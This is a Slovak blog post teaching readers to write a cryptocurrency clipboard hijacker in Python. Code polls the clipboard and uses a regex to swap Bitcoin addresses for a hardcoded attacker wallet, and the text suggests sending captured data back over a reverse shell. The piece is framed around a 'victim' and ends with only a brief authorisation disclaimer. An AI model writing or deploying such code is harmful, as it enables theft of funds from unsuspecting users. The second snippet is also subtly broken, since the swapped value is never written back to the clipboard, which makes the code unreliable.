Ako ovládnuť clipboard vašej obete v desiatich riadkoch.

Prvýkrát som sa hlbšie spoznal s kiberbezpečnosťou keď mi počas vrcholu bear trhu na kryptomenovej scéne útočník ukradol 200 eur v BNB.

Pamätám si, že pohľad na prázdnu peňaženku mi pokazil deň až do chvíle keď som nezistil ako mi ich ukradol.

Pri skúmaní, googlení a trackovaní som si všmiol, že keď skopírujem a následne prilepím svoju krypto peňaženku do Etherscanu kopírovaná a prilepená adresa sa nezhoduje.

Útočníkov kód mi teda menil skopírované adresy na jeho adresu, čím zaistil, že pri prevode nešli moje coiny naozajstnému príjemcovi, ale jemu.

Ako niekto, kto do vtedy nič podobné nezažil to na mňa spravilo dojem. Nemohol som byť naňho za taký ťah naštvaný.

Vždy ma zaujímalo, ako dlho by mi trvalo niečo také napísať napr. v Pythone. Ku podivu sa to dá zvládnuť v desiatich riadkoch:

from tkinter import Tk
old_clip = Tk().clipboard_get()
clip = old_clip
while (True):
    clip = Tk().clipboard_get()
    if (old_clip != clip):
        print(clip)
        old_clip = clip

Tento kód vám vždy po skopírovaní nejakého textu v termináli vypíše obsah clipboardu.

To nám ale nestačí, chceme nájsť a vymeniť adresu každej peňaženky, ktorá sa ocitne v clipboarde. Prídame teda nejaký ReGex a kostru máme hotovú.

from tkinter import Tk
import re
old_clip = Tk().clipboard_get()
clip = old_clip
while (True):
    clip = Tk().clipboard_get()
    if (old_clip != clip):
        old_clip = re.sub("([13]|bc1)[A-HJ-NP-Za-km-z1-9]{27,34}", "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2",clip) #druhý argument je naša peňaženka
        print(old_clip)
        old_clip = clip

Z tade máme niekoľko možností: buď tieto dáta uložíme do súboru, ktorý neskôr stiahneme, alebo ideálne obsah pošleme cez Reverse shell naspäť.

UPOZORNENIE: Skúšajte to prosíím iba na zariadeniach, pre ktoré máte povolenie.

Leave a Reply

Your email address will not be published. Required fields are marked *